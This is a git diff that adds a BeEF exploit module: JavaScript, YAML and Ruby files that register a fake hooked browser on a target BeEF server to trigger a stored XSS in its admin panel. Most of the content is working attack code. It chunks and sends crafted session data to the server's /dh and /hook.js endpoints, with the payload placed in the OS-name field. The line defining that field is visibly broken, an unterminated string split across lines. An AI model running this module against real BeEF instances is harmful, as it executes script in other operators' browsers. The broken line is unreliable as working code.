diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js
new file mode 100644
index 000000000..10318f560
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/command.js
@@ -0,0 +1,167 @@
+//
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var target_beef_url = "<%= @target_beef_url %>";
+ var xss_payload = "<%= @xss_payload %>";
+
+ // Generate a random session ID (80 characters, uppercase + digits)
+ function generateHookId() {
+ var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
+ var result = '';
+ for (var i = 0; i < 80; i++) {
+ result += chars.charAt(Math.floor(Math.random() * chars.length));
+ }
+ return result;
+ }
+
+ // Get current timestamp in milliseconds
+ function ts() {
+ return Date.now();
+ }
+
+ // Split string into chunks
+ function chunkString(str, length) {
+ var chunks = [];
+ for (var i = 0; i < str.length; i += length) {
+ chunks.push(str.substring(i, i + length));
+ }
+ return chunks;
+ }
+
+ // Base64 encode (using browser's btoa)
+ function b64encode(str) {
+ return btoa(str);
+ }
+
+ var HOOK = generateHookId();
+
+ // Build the malicious payload - XSS is injected into host.os.name
+ var malicious_os_name = 'Linux
';
+
+ var browser_data = [{
+ "cid": 0,
+ "results": {
+ "browser.window.cookies": "BEEFHOOK=" + HOOK,
+ "browser.name": "FFAA",
+ "browser.version": "146.0",
+ "browser.engine": "Gecko",
+ "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
+ "browser.platform": "Linux x86_64",
+ "browser.language": "en-US",
+ "browser.plugins": "PDF Viewer-v.undefined",
+ "browser.window.title": "Unknown",
+ "browser.window.origin": "http://exploited-host:8000",
+ "browser.window.hostname": "exploited-host",
+ "browser.window.hostport": "8000",
+ "browser.window.uri": "http://exploited-host:8000/victim.html",
+ "browser.window.referrer": "http://exploited-host:8000/victim.html",
+ "browser.window.size.width": 1678,
+ "browser.window.size.height": 168,
+ "browser.date.datestamp": new Date().toString(),
+ "host.os.name": malicious_os_name,
+ "host.os.family": "Linux",
+ "host.os.arch": 64,
+ "host.software.defaultbrowser": "Unknown",
+ "hardware.type": "Unknown",
+ "hardware.memory": "unknown",
+ "hardware.gpu": "unknown",
+ "hardware.gpu.vendor": "unknown",
+ "hardware.cpu.arch": "x86_64",
+ "hardware.cpu.cores": 32,
+ "hardware.battery.chargingstatus": "unknown",
+ "hardware.battery.level": "unknown",
+ "hardware.battery.chargingtime": "unknown",
+ "hardware.battery.dischargingtime": "unknown",
+ "hardware.screen.size.width": 5120,
+ "hardware.screen.size.height": 2160,
+ "hardware.screen.colordepth": 24,
+ "hardware.screen.touchenabled": "No",
+ "browser.capabilities.vbscript": "No",
+ "browser.capabilities.flash": "No",
+ "browser.capabilities.silverlight": "No",
+ "browser.capabilities.phonegap": "No",
+ "browser.capabilities.websocket": "Yes",
+ "browser.capabilities.webrtc": "No",
+ "browser.capabilities.webworker": "Yes",
+ "browser.capabilities.webgl": "No",
+ "browser.capabilities.googlegears": "No",
+ "browser.capabilities.activex": "No",
+ "browser.capabilities.quicktime": "No",
+ "browser.capabilities.realplayer": "No",
+ "browser.capabilities.wmp": "No",
+ "browser.capabilities.vlc": "No",
+ "HookSessionID": HOOK
+ },
+ "status": 0,
+ "handler": "/init"
+ }];
+
+ var encoded_data = b64encode(JSON.stringify(browser_data));
+ var chunks = chunkString(encoded_data, 383);
+
+ beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
+ beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
+ beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
+
+ var requests_sent = 0;
+ var requests_completed = 0;
+ var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
+
+ function checkComplete() {
+ if (requests_completed >= total_requests) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,
+ "result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK +
+ ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
+ beef.are.status_success());
+ }
+ }
+
+ // Send chunks for session IDs 1 and 2
+ for (var sid = 1; sid <= 2; sid++) {
+ for (var idx = 0; idx < chunks.length; idx++) {
+ (function(s, i, chunk) {
+ var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
+ var img = new Image();
+ img.onload = img.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img.src = url;
+ requests_sent++;
+ })(sid, idx, chunks[idx]);
+ }
+ }
+
+ // Send hook.js request after a short delay
+ setTimeout(function() {
+ var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
+ var img2 = new Image();
+ img2.onload = img2.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img2.src = hookUrl;
+ requests_sent++;
+
+ // Send final dh request
+ setTimeout(function() {
+ var finalChunk = chunks[chunks.length - 1] || "";
+ var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
+ var img3 = new Image();
+ img3.onload = img3.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img3.src = finalUrl;
+ requests_sent++;
+ }, 100);
+ }, 500);
+
+ beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
+
+});
diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml
new file mode 100644
index 000000000..ecdd537e8
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ beef_admin_panel_xss:
+ enable: true
+ category: "Exploits"
+ name: "BeEF Admin Panel XSS"
+ description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.
This can be used to test if a target BeEF instance is running a vulnerable version."
+ authors: ["radsec"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb
new file mode 100644
index 000000000..c5753dc76
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/module.rb
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_admin_panel_xss < BeEF::Core::Command
+ def self.options
+ [
+ { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
+ { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' }
+ ]
+ end
+
+ def post_execute
+ save({ 'result' => @datastore['result'] })
+ end
+end